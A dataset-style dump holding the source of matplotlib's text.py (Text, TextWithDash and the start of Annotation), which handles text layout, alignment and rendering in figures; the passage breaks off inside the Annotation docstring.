repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
runt18/nupic
|
external/linux32/lib/python2.6/site-packages/matplotlib/text.py
|
1
|
55450
|
"""
Classes for including text in a figure.
"""
from __future__ import division
import math
import numpy as np
from matplotlib import cbook
from matplotlib import rcParams
import artist
from artist import Artist
from cbook import is_string_like, maxdict
from font_manager import FontProperties
from patches import bbox_artist, YAArrow, FancyBboxPatch, \
FancyArrowPatch, Rectangle
import transforms as mtransforms
from transforms import Affine2D, Bbox
from lines import Line2D
import matplotlib.nxutils as nxutils
def _process_text_args(override, fontdict=None, **kwargs):
"Return an override dict. See :func:`~pyplot.text' docstring for info"
if fontdict is not None:
override.update(fontdict)
override.update(kwargs)
return override
# Extracted from Text's method to serve as a function
def get_rotation(rotation):
"""
Return the text angle as float.
*rotation* may be 'horizontal', 'vertical', or a numeric value in degrees.
"""
if rotation in ('horizontal', None):
angle = 0.
elif rotation == 'vertical':
angle = 90.
else:
angle = float(rotation)
return angle%360
# these are not available for the object inspector until after the
# class is build so we define an initial set here for the init
# function and they will be overridden after object defn
artist.kwdocd['Text'] = """
========================== =========================================================================
Property Value
========================== =========================================================================
alpha float
animated [True | False]
backgroundcolor any matplotlib color
bbox rectangle prop dict plus key 'pad' which is a pad in points
clip_box a matplotlib.transform.Bbox instance
clip_on [True | False]
color any matplotlib color
family [ 'serif' | 'sans-serif' | 'cursive' | 'fantasy' | 'monospace' ]
figure a matplotlib.figure.Figure instance
fontproperties a matplotlib.font_manager.FontProperties instance
horizontalalignment or ha [ 'center' | 'right' | 'left' ]
label any string
linespacing float
lod [True | False]
multialignment ['left' | 'right' | 'center' ]
name or fontname string eg, ['Sans' | 'Courier' | 'Helvetica' ...]
position (x,y)
rotation [ angle in degrees 'vertical' | 'horizontal'
size or fontsize [ size in points | relative size eg 'smaller', 'x-large' ]
style or fontstyle [ 'normal' | 'italic' | 'oblique']
text string
transform a matplotlib.transform transformation instance
variant [ 'normal' | 'small-caps' ]
verticalalignment or va [ 'center' | 'top' | 'bottom' | 'baseline' ]
visible [True | False]
weight or fontweight [ 'normal' | 'bold' | 'heavy' | 'light' | 'ultrabold' | 'ultralight']
x float
y float
zorder any number
========================== =========================================================================
"""
# TODO : This function may move into the Text class as a method. As a
# matter of fact, The information from the _get_textbox function
# should be available during the Text._get_layout() call, which is
# called within the _get_textbox. So, it would better to move this
# function as a method with some refactoring of _get_layout method.
def _get_textbox(text, renderer):
"""
Calculate the bounding box of the text. Unlike
:meth:`matplotlib.text.Text.get_extents` method, The bbox size of
the text before the rotation is calculated.
"""
projected_xs = []
projected_ys = []
theta = text.get_rotation()/180.*math.pi
tr = mtransforms.Affine2D().rotate(-theta)
for t, wh, x, y in text._get_layout(renderer)[1]:
w, h = wh
xt1, yt1 = tr.transform_point((x, y))
xt2, yt2 = xt1+w, yt1+h
projected_xs.extend([xt1, xt2])
projected_ys.extend([yt1, yt2])
xt_box, yt_box = min(projected_xs), min(projected_ys)
w_box, h_box = max(projected_xs) - xt_box, max(projected_ys) - yt_box
tr = mtransforms.Affine2D().rotate(theta)
x_box, y_box = tr.transform_point((xt_box, yt_box))
return x_box, y_box, w_box, h_box
class Text(Artist):
"""
Handle storing and drawing of text in window or data coordinates.
"""
zorder = 3
def __str__(self):
return "Text({0:g},{1:g},{2!s})".format(self._y, self._y, repr(self._text))
def __init__(self,
x=0, y=0, text='',
color=None, # defaults to rc params
verticalalignment='bottom',
horizontalalignment='left',
multialignment=None,
fontproperties=None, # defaults to FontProperties()
rotation=None,
linespacing=None,
**kwargs
):
"""
Create a :class:`~matplotlib.text.Text` instance at *x*, *y*
with string *text*.
Valid kwargs are
%(Text)s
"""
Artist.__init__(self)
self.cached = maxdict(5)
self._x, self._y = x, y
if color is None: color = rcParams['text.color']
if fontproperties is None: fontproperties=FontProperties()
elif is_string_like(fontproperties): fontproperties=FontProperties(fontproperties)
self.set_text(text)
self.set_color(color)
self._verticalalignment = verticalalignment
self._horizontalalignment = horizontalalignment
self._multialignment = multialignment
self._rotation = rotation
self._fontproperties = fontproperties
self._bbox = None
self._bbox_patch = None # a FancyBboxPatch instance
self._renderer = None
if linespacing is None:
linespacing = 1.2 # Maybe use rcParam later.
self._linespacing = linespacing
self.update(kwargs)
#self.set_bbox(dict(pad=0))
def contains(self,mouseevent):
"""Test whether the mouse event occurred in the patch.
In the case of text, a hit is true anywhere in the
axis-aligned bounding-box containing the text.
Returns True or False.
"""
if callable(self._contains): return self._contains(self,mouseevent)
if not self.get_visible() or self._renderer is None:
return False,{}
l,b,w,h = self.get_window_extent().bounds
r = l+w
t = b+h
xyverts = (l,b), (l, t), (r, t), (r, b)
x, y = mouseevent.x, mouseevent.y
inside = nxutils.pnpoly(x, y, xyverts)
return inside,{}
def _get_xy_display(self):
'get the (possibly unit converted) transformed x, y in display coords'
x, y = self.get_position()
return self.get_transform().transform_point((x,y))
def _get_multialignment(self):
if self._multialignment is not None: return self._multialignment
else: return self._horizontalalignment
def get_rotation(self):
'return the text angle as float in degrees'
return get_rotation(self._rotation) # string_or_number -> number
def update_from(self, other):
'Copy properties from other to self'
Artist.update_from(self, other)
self._color = other._color
self._multialignment = other._multialignment
self._verticalalignment = other._verticalalignment
self._horizontalalignment = other._horizontalalignment
self._fontproperties = other._fontproperties.copy()
self._rotation = other._rotation
self._picker = other._picker
self._linespacing = other._linespacing
def _get_layout(self, renderer):
key = self.get_prop_tup()
if key in self.cached: return self.cached[key]
horizLayout = []
thisx, thisy = 0.0, 0.0
xmin, ymin = 0.0, 0.0
width, height = 0.0, 0.0
lines = self._text.split('\n')
whs = np.zeros((len(lines), 2))
horizLayout = np.zeros((len(lines), 4))
# Find full vertical extent of font,
# including ascenders and descenders:
tmp, heightt, bl = renderer.get_text_width_height_descent(
'lp', self._fontproperties, ismath=False)
offsety = heightt * self._linespacing
baseline = None
for i, line in enumerate(lines):
clean_line, ismath = self.is_math_text(line)
w, h, d = renderer.get_text_width_height_descent(
clean_line, self._fontproperties, ismath=ismath)
if baseline is None:
baseline = h - d
whs[i] = w, h
horizLayout[i] = thisx, thisy, w, h
thisy -= offsety
width = max(width, w)
ymin = horizLayout[-1][1]
ymax = horizLayout[0][1] + horizLayout[0][3]
height = ymax-ymin
xmax = xmin + width
# get the rotation matrix
M = Affine2D().rotate_deg(self.get_rotation())
offsetLayout = np.zeros((len(lines), 2))
offsetLayout[:] = horizLayout[:, 0:2]
# now offset the individual text lines within the box
if len(lines)>1: # do the multiline aligment
malign = self._get_multialignment()
if malign == 'center':
offsetLayout[:, 0] += width/2.0 - horizLayout[:, 2] / 2.0
elif malign == 'right':
offsetLayout[:, 0] += width - horizLayout[:, 2]
# the corners of the unrotated bounding box
cornersHoriz = np.array(
[(xmin, ymin), (xmin, ymax), (xmax, ymax), (xmax, ymin)],
np.float_)
# now rotate the bbox
cornersRotated = M.transform(cornersHoriz)
txs = cornersRotated[:, 0]
tys = cornersRotated[:, 1]
# compute the bounds of the rotated box
xmin, xmax = txs.min(), txs.max()
ymin, ymax = tys.min(), tys.max()
width = xmax - xmin
height = ymax - ymin
# Now move the box to the targe position offset the display bbox by alignment
halign = self._horizontalalignment
valign = self._verticalalignment
# compute the text location in display coords and the offsets
# necessary to align the bbox with that location
if halign=='center': offsetx = (xmin + width/2.0)
elif halign=='right': offsetx = (xmin + width)
else: offsetx = xmin
if valign=='center': offsety = (ymin + height/2.0)
elif valign=='top': offsety = (ymin + height)
elif valign=='baseline': offsety = (ymin + height) - baseline
else: offsety = ymin
xmin -= offsetx
ymin -= offsety
bbox = Bbox.from_bounds(xmin, ymin, width, height)
# now rotate the positions around the first x,y position
xys = M.transform(offsetLayout)
xys -= (offsetx, offsety)
xs, ys = xys[:, 0], xys[:, 1]
ret = bbox, zip(lines, whs, xs, ys)
self.cached[key] = ret
return ret
def set_bbox(self, rectprops):
"""
Draw a bounding box around self. rectprops are any settable
properties for a rectangle, eg facecolor='red', alpha=0.5.
t.set_bbox(dict(facecolor='red', alpha=0.5))
If rectprops has "boxstyle" key. A FancyBboxPatch
is initialized with rectprops and will be drawn. The mutation
scale of the FancyBboxPath is set to the fontsize.
ACCEPTS: rectangle prop dict
"""
# The self._bbox_patch object is created only if rectprops has
# boxstyle key. Otherwise, self._bbox will be set to the
# rectprops and the bbox will be drawn using bbox_artist
# function. This is to keep the backward compatibility.
if rectprops is not None and "boxstyle" in rectprops:
props = rectprops.copy()
boxstyle = props.pop("boxstyle")
bbox_transmuter = props.pop("bbox_transmuter", None)
self._bbox_patch = FancyBboxPatch((0., 0.),
1., 1.,
boxstyle=boxstyle,
bbox_transmuter=bbox_transmuter,
transform=mtransforms.IdentityTransform(),
**props)
self._bbox = None
else:
self._bbox_patch = None
self._bbox = rectprops
def get_bbox_patch(self):
"""
Return the bbox Patch object. Returns None if the the
FancyBboxPatch is not made.
"""
return self._bbox_patch
def update_bbox_position_size(self, renderer):
"""
Update the location and the size of the bbox. This method
should be used when the position and size of the bbox needs to
be updated before actually drawing the bbox.
"""
# For arrow_patch, use textbox as patchA by default.
if not isinstance(self.arrow_patch, FancyArrowPatch):
return
if self._bbox_patch:
trans = self.get_transform()
# don't use self.get_position here, which refers to text position
# in Text, and dash position in TextWithDash:
posx = float(self.convert_xunits(self._x))
posy = float(self.convert_yunits(self._y))
posx, posy = trans.transform_point((posx, posy))
x_box, y_box, w_box, h_box = _get_textbox(self, renderer)
self._bbox_patch.set_bounds(0., 0.,
w_box, h_box)
theta = self.get_rotation()/180.*math.pi
tr = mtransforms.Affine2D().rotate(theta)
tr = tr.translate(posx+x_box, posy+y_box)
self._bbox_patch.set_transform(tr)
fontsize_in_pixel = renderer.points_to_pixels(self.get_size())
self._bbox_patch.set_mutation_scale(fontsize_in_pixel)
#self._bbox_patch.draw(renderer)
else:
props = self._bbox
if props is None: props = {}
props = props.copy() # don't want to alter the pad externally
pad = props.pop('pad', 4)
pad = renderer.points_to_pixels(pad)
bbox = self.get_window_extent(renderer)
l,b,w,h = bbox.bounds
l-=pad/2.
b-=pad/2.
w+=pad
h+=pad
r = Rectangle(xy=(l,b),
width=w,
height=h,
)
r.set_transform(mtransforms.IdentityTransform())
r.set_clip_on( False )
r.update(props)
self.arrow_patch.set_patchA(r)
def _draw_bbox(self, renderer, posx, posy):
""" Update the location and the size of the bbox
(FancyBoxPatch), and draw
"""
x_box, y_box, w_box, h_box = _get_textbox(self, renderer)
self._bbox_patch.set_bounds(0., 0.,
w_box, h_box)
theta = self.get_rotation()/180.*math.pi
tr = mtransforms.Affine2D().rotate(theta)
tr = tr.translate(posx+x_box, posy+y_box)
self._bbox_patch.set_transform(tr)
fontsize_in_pixel = renderer.points_to_pixels(self.get_size())
self._bbox_patch.set_mutation_scale(fontsize_in_pixel)
self._bbox_patch.draw(renderer)
def draw(self, renderer):
"""
Draws the :class:`Text` object to the given *renderer*.
"""
if renderer is not None:
self._renderer = renderer
if not self.get_visible(): return
if self._text=='': return
bbox, info = self._get_layout(renderer)
trans = self.get_transform()
# don't use self.get_position here, which refers to text position
# in Text, and dash position in TextWithDash:
posx = float(self.convert_xunits(self._x))
posy = float(self.convert_yunits(self._y))
posx, posy = trans.transform_point((posx, posy))
canvasw, canvash = renderer.get_canvas_width_height()
# draw the FancyBboxPatch
if self._bbox_patch:
self._draw_bbox(renderer, posx, posy)
gc = renderer.new_gc()
gc.set_foreground(self._color)
gc.set_alpha(self._alpha)
gc.set_url(self._url)
if self.get_clip_on():
gc.set_clip_rectangle(self.clipbox)
if self._bbox:
bbox_artist(self, renderer, self._bbox)
angle = self.get_rotation()
if rcParams['text.usetex']:
for line, wh, x, y in info:
x = x + posx
y = y + posy
if renderer.flipy():
y = canvash-y
clean_line, ismath = self.is_math_text(line)
renderer.draw_tex(gc, x, y, clean_line,
self._fontproperties, angle)
return
for line, wh, x, y in info:
x = x + posx
y = y + posy
if renderer.flipy():
y = canvash-y
clean_line, ismath = self.is_math_text(line)
renderer.draw_text(gc, x, y, clean_line,
self._fontproperties, angle,
ismath=ismath)
def get_color(self):
"Return the color of the text"
return self._color
def get_fontproperties(self):
"Return the :class:`~font_manager.FontProperties` object"
return self._fontproperties
def get_font_properties(self):
'alias for get_fontproperties'
return self.get_fontproperties
def get_family(self):
"Return the list of font families used for font lookup"
return self._fontproperties.get_family()
def get_fontfamily(self):
'alias for get_family'
return self.get_family()
def get_name(self):
"Return the font name as string"
return self._fontproperties.get_name()
def get_style(self):
"Return the font style as string"
return self._fontproperties.get_style()
def get_size(self):
"Return the font size as integer"
return self._fontproperties.get_size_in_points()
def get_variant(self):
"Return the font variant as a string"
return self._fontproperties.get_variant()
def get_fontvariant(self):
'alias for get_variant'
return self.get_variant()
def get_weight(self):
"Get the font weight as string or number"
return self._fontproperties.get_weight()
def get_fontname(self):
'alias for get_name'
return self.get_name()
def get_fontstyle(self):
'alias for get_style'
return self.get_style()
def get_fontsize(self):
'alias for get_size'
return self.get_size()
def get_fontweight(self):
'alias for get_weight'
return self.get_weight()
def get_stretch(self):
'Get the font stretch as a string or number'
return self._fontproperties.get_stretch()
def get_fontstretch(self):
'alias for get_stretch'
return self.get_stretch()
def get_ha(self):
'alias for get_horizontalalignment'
return self.get_horizontalalignment()
def get_horizontalalignment(self):
"""
Return the horizontal alignment as string. Will be one of
'left', 'center' or 'right'.
"""
return self._horizontalalignment
def get_position(self):
"Return the position of the text as a tuple (*x*, *y*)"
x = float(self.convert_xunits(self._x))
y = float(self.convert_yunits(self._y))
return x, y
def get_prop_tup(self):
"""
Return a hashable tuple of properties.
Not intended to be human readable, but useful for backends who
want to cache derived information about text (eg layouts) and
need to know if the text has changed.
"""
x, y = self.get_position()
return (x, y, self._text, self._color,
self._verticalalignment, self._horizontalalignment,
hash(self._fontproperties), self._rotation,
self.figure.dpi, id(self._renderer),
)
def get_text(self):
"Get the text as string"
return self._text
def get_va(self):
'alias for :meth:`getverticalalignment`'
return self.get_verticalalignment()
def get_verticalalignment(self):
"""
Return the vertical alignment as string. Will be one of
'top', 'center', 'bottom' or 'baseline'.
"""
return self._verticalalignment
def get_window_extent(self, renderer=None, dpi=None):
'''
Return a :class:`~matplotlib.transforms.Bbox` object bounding
the text, in display units.
In addition to being used internally, this is useful for
specifying clickable regions in a png file on a web page.
*renderer* defaults to the _renderer attribute of the text
object. This is not assigned until the first execution of
:meth:`draw`, so you must use this kwarg if you want
to call :meth:`get_window_extent` prior to the first
:meth:`draw`. For getting web page regions, it is
simpler to call the method after saving the figure.
*dpi* defaults to self.figure.dpi; the renderer dpi is
irrelevant. For the web application, if figure.dpi is not
the value used when saving the figure, then the value that
was used must be specified as the *dpi* argument.
'''
#return _unit_box
if not self.get_visible(): return Bbox.unit()
if dpi is not None:
dpi_orig = self.figure.dpi
self.figure.dpi = dpi
if self._text == '':
tx, ty = self._get_xy_display()
return Bbox.from_bounds(tx,ty,0,0)
if renderer is not None:
self._renderer = renderer
if self._renderer is None:
raise RuntimeError('Cannot get window extent w/o renderer')
bbox, info = self._get_layout(self._renderer)
x, y = self.get_position()
x, y = self.get_transform().transform_point((x, y))
bbox = bbox.translated(x, y)
if dpi is not None:
self.figure.dpi = dpi_orig
return bbox
def set_backgroundcolor(self, color):
"""
Set the background color of the text by updating the bbox.
.. seealso::
:meth:`set_bbox`
ACCEPTS: any matplotlib color
"""
if self._bbox is None:
self._bbox = dict(facecolor=color, edgecolor=color)
else:
self._bbox.update(dict(facecolor=color))
def set_color(self, color):
"""
Set the foreground color of the text
ACCEPTS: any matplotlib color
"""
# Make sure it is hashable, or get_prop_tup will fail.
try:
hash(color)
except TypeError:
color = tuple(color)
self._color = color
def set_ha(self, align):
'alias for set_horizontalalignment'
self.set_horizontalalignment(align)
def set_horizontalalignment(self, align):
"""
Set the horizontal alignment to one of
ACCEPTS: [ 'center' | 'right' | 'left' ]
"""
legal = ('center', 'right', 'left')
if align not in legal:
raise ValueError('Horizontal alignment must be one of {0!s}'.format(str(legal)))
self._horizontalalignment = align
def set_ma(self, align):
'alias for set_verticalalignment'
self.set_multialignment(align)
def set_multialignment(self, align):
"""
Set the alignment for multiple lines layout. The layout of the
bounding box of all the lines is determined bu the horizontalalignment
and verticalalignment properties, but the multiline text within that
box can be
ACCEPTS: ['left' | 'right' | 'center' ]
"""
legal = ('center', 'right', 'left')
if align not in legal:
raise ValueError('Horizontal alignment must be one of {0!s}'.format(str(legal)))
self._multialignment = align
def set_linespacing(self, spacing):
"""
Set the line spacing as a multiple of the font size.
Default is 1.2.
ACCEPTS: float (multiple of font size)
"""
self._linespacing = spacing
def set_family(self, fontname):
"""
Set the font family. May be either a single string, or a list
of strings in decreasing priority. Each string may be either
a real font name or a generic font class name. If the latter,
the specific font names will be looked up in the
:file:`matplotlibrc` file.
ACCEPTS: [ FONTNAME | 'serif' | 'sans-serif' | 'cursive' | 'fantasy' | 'monospace' ]
"""
self._fontproperties.set_family(fontname)
def set_variant(self, variant):
"""
Set the font variant, either 'normal' or 'small-caps'.
ACCEPTS: [ 'normal' | 'small-caps' ]
"""
self._fontproperties.set_variant(variant)
def set_fontvariant(self, variant):
'alias for set_variant'
return self.set_variant(variant)
def set_name(self, fontname):
"""alias for set_family"""
return self.set_family(fontname)
def set_fontname(self, fontname):
"""alias for set_family"""
self.set_family(fontname)
def set_style(self, fontstyle):
"""
Set the font style.
ACCEPTS: [ 'normal' | 'italic' | 'oblique']
"""
self._fontproperties.set_style(fontstyle)
def set_fontstyle(self, fontstyle):
'alias for set_style'
return self.set_style(fontstyle)
def set_size(self, fontsize):
"""
Set the font size. May be either a size string, relative to
the default font size, or an absolute font size in points.
ACCEPTS: [ size in points | 'xx-small' | 'x-small' | 'small' | 'medium' | 'large' | 'x-large' | 'xx-large' ]
"""
self._fontproperties.set_size(fontsize)
def set_fontsize(self, fontsize):
'alias for set_size'
return self.set_size(fontsize)
def set_weight(self, weight):
"""
Set the font weight.
ACCEPTS: [ a numeric value in range 0-1000 | 'ultralight' | 'light' | 'normal' | 'regular' | 'book' | 'medium' | 'roman' | 'semibold' | 'demibold' | 'demi' | 'bold' | 'heavy' | 'extra bold' | 'black' ]
"""
self._fontproperties.set_weight(weight)
def set_fontweight(self, weight):
'alias for set_weight'
return self.set_weight(weight)
def set_stretch(self, stretch):
"""
Set the font stretch (horizontal condensation or expansion).
ACCEPTS: [ a numeric value in range 0-1000 | 'ultra-condensed' | 'extra-condensed' | 'condensed' | 'semi-condensed' | 'normal' | 'semi-expanded' | 'expanded' | 'extra-expanded' | 'ultra-expanded' ]
"""
self._fontproperties.set_stretch(stretch)
def set_fontstretch(self, stretch):
'alias for set_stretch'
return self.set_stretch(stretch)
def set_position(self, xy):
"""
Set the (*x*, *y*) position of the text
ACCEPTS: (x,y)
"""
self.set_x(xy[0])
self.set_y(xy[1])
def set_x(self, x):
"""
Set the *x* position of the text
ACCEPTS: float
"""
self._x = x
def set_y(self, y):
"""
Set the *y* position of the text
ACCEPTS: float
"""
self._y = y
def set_rotation(self, s):
"""
Set the rotation of the text
ACCEPTS: [ angle in degrees | 'vertical' | 'horizontal' ]
"""
self._rotation = s
def set_va(self, align):
'alias for set_verticalalignment'
self.set_verticalalignment(align)
def set_verticalalignment(self, align):
"""
Set the vertical alignment
ACCEPTS: [ 'center' | 'top' | 'bottom' | 'baseline' ]
"""
legal = ('top', 'bottom', 'center', 'baseline')
if align not in legal:
raise ValueError('Vertical alignment must be one of {0!s}'.format(str(legal)))
self._verticalalignment = align
def set_text(self, s):
"""
Set the text string *s*
It may contain newlines (``\\n``) or math in LaTeX syntax.
ACCEPTS: string or anything printable with '%s' conversion.
"""
self._text = '{0!s}'.format(s)
def is_math_text(self, s):
"""
Returns True if the given string *s* contains any mathtext.
"""
# Did we find an even number of non-escaped dollar signs?
# If so, treat is as math text.
dollar_count = s.count(r'$') - s.count(r'\$')
even_dollars = (dollar_count > 0 and dollar_count % 2 == 0)
if rcParams['text.usetex']:
return s, 'TeX'
if even_dollars:
return s, True
else:
return s.replace(r'\$', '$'), False
def set_fontproperties(self, fp):
"""
Set the font properties that control the text. *fp* must be a
:class:`matplotlib.font_manager.FontProperties` object.
ACCEPTS: a :class:`matplotlib.font_manager.FontProperties` instance
"""
if is_string_like(fp):
fp = FontProperties(fp)
self._fontproperties = fp.copy()
def set_font_properties(self, fp):
'alias for set_fontproperties'
self.set_fontproperties(fp)
artist.kwdocd['Text'] = artist.kwdoc(Text)
Text.__init__.im_func.__doc__ = cbook.dedent(Text.__init__.__doc__) % artist.kwdocd
class TextWithDash(Text):
"""
This is basically a :class:`~matplotlib.text.Text` with a dash
(drawn with a :class:`~matplotlib.lines.Line2D`) before/after
it. It is intended to be a drop-in replacement for
:class:`~matplotlib.text.Text`, and should behave identically to
it when *dashlength* = 0.0.
The dash always comes between the point specified by
:meth:`~matplotlib.text.Text.set_position` and the text. When a
dash exists, the text alignment arguments (*horizontalalignment*,
*verticalalignment*) are ignored.
*dashlength* is the length of the dash in canvas units.
(default = 0.0).
*dashdirection* is one of 0 or 1, where 0 draws the dash after the
text and 1 before. (default = 0).
*dashrotation* specifies the rotation of the dash, and should
generally stay *None*. In this case
:meth:`~matplotlib.text.TextWithDash.get_dashrotation` returns
:meth:`~matplotlib.text.Text.get_rotation`. (I.e., the dash takes
its rotation from the text's rotation). Because the text center is
projected onto the dash, major deviations in the rotation cause
what may be considered visually unappealing results.
(default = *None*)
*dashpad* is a padding length to add (or subtract) space
between the text and the dash, in canvas units.
(default = 3)
*dashpush* "pushes" the dash and text away from the point
specified by :meth:`~matplotlib.text.Text.set_position` by the
amount in canvas units. (default = 0)
.. note::
The alignment of the two objects is based on the bounding box
of the :class:`~matplotlib.text.Text`, as obtained by
:meth:`~matplotlib.artist.Artist.get_window_extent`. This, in
turn, appears to depend on the font metrics as given by the
rendering backend. Hence the quality of the "centering" of the
label text with respect to the dash varies depending on the
backend used.
.. note::
I'm not sure that I got the
:meth:`~matplotlib.text.TextWithDash.get_window_extent` right,
or whether that's sufficient for providing the object bounding
box.
"""
__name__ = 'textwithdash'
def __str__(self):
return "TextWithDash({0:g},{1:g},{2!s})".format(self._x, self._y, repr(self._text))
def __init__(self,
x=0, y=0, text='',
color=None, # defaults to rc params
verticalalignment='center',
horizontalalignment='center',
multialignment=None,
fontproperties=None, # defaults to FontProperties()
rotation=None,
linespacing=None,
dashlength=0.0,
dashdirection=0,
dashrotation=None,
dashpad=3,
dashpush=0,
):
Text.__init__(self, x=x, y=y, text=text, color=color,
verticalalignment=verticalalignment,
horizontalalignment=horizontalalignment,
multialignment=multialignment,
fontproperties=fontproperties,
rotation=rotation,
linespacing=linespacing)
# The position (x,y) values for text and dashline
# are bogus as given in the instantiation; they will
# be set correctly by update_coords() in draw()
self.dashline = Line2D(xdata=(x, x),
ydata=(y, y),
color='k',
linestyle='-')
self._dashx = float(x)
self._dashy = float(y)
self._dashlength = dashlength
self._dashdirection = dashdirection
self._dashrotation = dashrotation
self._dashpad = dashpad
self._dashpush = dashpush
#self.set_bbox(dict(pad=0))
def get_position(self):
"Return the position of the text as a tuple (*x*, *y*)"
x = float(self.convert_xunits(self._dashx))
y = float(self.convert_yunits(self._dashy))
return x, y
def get_prop_tup(self):
"""
Return a hashable tuple of properties.
Not intended to be human readable, but useful for backends who
want to cache derived information about text (eg layouts) and
need to know if the text has changed.
"""
props = [p for p in Text.get_prop_tup(self)]
props.extend([self._x, self._y, self._dashlength, self._dashdirection, self._dashrotation, self._dashpad, self._dashpush])
return tuple(props)
def draw(self, renderer):
"""
Draw the :class:`TextWithDash` object to the given *renderer*.
"""
self.update_coords(renderer)
Text.draw(self, renderer)
if self.get_dashlength() > 0.0:
self.dashline.draw(renderer)
def update_coords(self, renderer):
"""
Computes the actual *x*, *y* coordinates for text based on the
input *x*, *y* and the *dashlength*. Since the rotation is
with respect to the actual canvas's coordinates we need to map
back and forth.
"""
dashx, dashy = self.get_position()
dashlength = self.get_dashlength()
# Shortcircuit this process if we don't have a dash
if dashlength == 0.0:
self._x, self._y = dashx, dashy
return
dashrotation = self.get_dashrotation()
dashdirection = self.get_dashdirection()
dashpad = self.get_dashpad()
dashpush = self.get_dashpush()
angle = get_rotation(dashrotation)
theta = np.pi*(angle/180.0+dashdirection-1)
cos_theta, sin_theta = np.cos(theta), np.sin(theta)
transform = self.get_transform()
# Compute the dash end points
# The 'c' prefix is for canvas coordinates
cxy = transform.transform_point((dashx, dashy))
cd = np.array([cos_theta, sin_theta])
c1 = cxy+dashpush*cd
c2 = cxy+(dashpush+dashlength)*cd
inverse = transform.inverted()
(x1, y1) = inverse.transform_point(tuple(c1))
(x2, y2) = inverse.transform_point(tuple(c2))
self.dashline.set_data((x1, x2), (y1, y2))
# We now need to extend this vector out to
# the center of the text area.
# The basic problem here is that we're "rotating"
# two separate objects but want it to appear as
# if they're rotated together.
# This is made non-trivial because of the
# interaction between text rotation and alignment -
# text alignment is based on the bbox after rotation.
# We reset/force both alignments to 'center'
# so we can do something relatively reasonable.
# There's probably a better way to do this by
# embedding all this in the object's transformations,
# but I don't grok the transformation stuff
# well enough yet.
we = Text.get_window_extent(self, renderer=renderer)
w, h = we.width, we.height
# Watch for zeros
if sin_theta == 0.0:
dx = w
dy = 0.0
elif cos_theta == 0.0:
dx = 0.0
dy = h
else:
tan_theta = sin_theta/cos_theta
dx = w
dy = w*tan_theta
if dy > h or dy < -h:
dy = h
dx = h/tan_theta
cwd = np.array([dx, dy])/2
cwd *= 1+dashpad/np.sqrt(np.dot(cwd,cwd))
cw = c2+(dashdirection*2-1)*cwd
newx, newy = inverse.transform_point(tuple(cw))
self._x, self._y = newx, newy
# Now set the window extent
# I'm not at all sure this is the right way to do this.
we = Text.get_window_extent(self, renderer=renderer)
self._twd_window_extent = we.frozen()
self._twd_window_extent.update_from_data_xy(np.array([c1]), False)
# Finally, make text align center
Text.set_horizontalalignment(self, 'center')
Text.set_verticalalignment(self, 'center')
def get_window_extent(self, renderer=None):
'''
Return a :class:`~matplotlib.transforms.Bbox` object bounding
the text, in display units.
In addition to being used internally, this is useful for
specifying clickable regions in a png file on a web page.
*renderer* defaults to the _renderer attribute of the text
object. This is not assigned until the first execution of
:meth:`draw`, so you must use this kwarg if you want
to call :meth:`get_window_extent` prior to the first
:meth:`draw`. For getting web page regions, it is
simpler to call the method after saving the figure.
'''
self.update_coords(renderer)
if self.get_dashlength() == 0.0:
return Text.get_window_extent(self, renderer=renderer)
else:
return self._twd_window_extent
def get_dashlength(self):
"""
Get the length of the dash.
"""
return self._dashlength
def set_dashlength(self, dl):
"""
Set the length of the dash.
ACCEPTS: float (canvas units)
"""
self._dashlength = dl
def get_dashdirection(self):
"""
Get the direction dash. 1 is before the text and 0 is after.
"""
return self._dashdirection
def set_dashdirection(self, dd):
"""
Set the direction of the dash following the text.
1 is before the text and 0 is after. The default
is 0, which is what you'd want for the typical
case of ticks below and on the left of the figure.
ACCEPTS: int (1 is before, 0 is after)
"""
self._dashdirection = dd
def get_dashrotation(self):
"""
Get the rotation of the dash in degrees.
"""
if self._dashrotation is None:
return self.get_rotation()
else:
return self._dashrotation
def set_dashrotation(self, dr):
"""
Set the rotation of the dash, in degrees
ACCEPTS: float (degrees)
"""
self._dashrotation = dr
def get_dashpad(self):
"""
Get the extra spacing between the dash and the text, in canvas units.
"""
return self._dashpad
def set_dashpad(self, dp):
"""
Set the "pad" of the TextWithDash, which is the extra spacing
between the dash and the text, in canvas units.
ACCEPTS: float (canvas units)
"""
self._dashpad = dp
def get_dashpush(self):
"""
Get the extra spacing between the dash and the specified text
position, in canvas units.
"""
return self._dashpush
def set_dashpush(self, dp):
"""
Set the "push" of the TextWithDash, which
is the extra spacing between the beginning
of the dash and the specified position.
ACCEPTS: float (canvas units)
"""
self._dashpush = dp
def set_position(self, xy):
"""
Set the (*x*, *y*) position of the :class:`TextWithDash`.
ACCEPTS: (x, y)
"""
self.set_x(xy[0])
self.set_y(xy[1])
def set_x(self, x):
"""
Set the *x* position of the :class:`TextWithDash`.
ACCEPTS: float
"""
self._dashx = float(x)
def set_y(self, y):
"""
Set the *y* position of the :class:`TextWithDash`.
ACCEPTS: float
"""
self._dashy = float(y)
def set_transform(self, t):
"""
Set the :class:`matplotlib.transforms.Transform` instance used
by this artist.
ACCEPTS: a :class:`matplotlib.transforms.Transform` instance
"""
Text.set_transform(self, t)
self.dashline.set_transform(t)
def get_figure(self):
'return the figure instance the artist belongs to'
return self.figure
def set_figure(self, fig):
"""
Set the figure instance the artist belong to.
ACCEPTS: a :class:`matplotlib.figure.Figure` instance
"""
Text.set_figure(self, fig)
self.dashline.set_figure(fig)
artist.kwdocd['TextWithDash'] = artist.kwdoc(TextWithDash)
class Annotation(Text):
"""
A :class:`~matplotlib.text.Text` class to make annotating things
in the figure, such as :class:`~matplotlib.figure.Figure`,
:class:`~matplotlib.axes.Axes`,
:class:`~matplotlib.patches.Rectangle`, etc., easier.
"""
def __str__(self):
return "Annotation({0:g},{1:g},{2!s})".format(self.xy[0], self.xy[1], repr(self._text))
def __init__(self, s, xy,
xytext=None,
xycoords='data',
textcoords=None,
arrowprops=None,
**kwargs):
"""
Annotate the *x*, *y* point *xy* with text *s* at *x*, *y*
location *xytext*. (If *xytext* = *None*, defaults to *xy*,
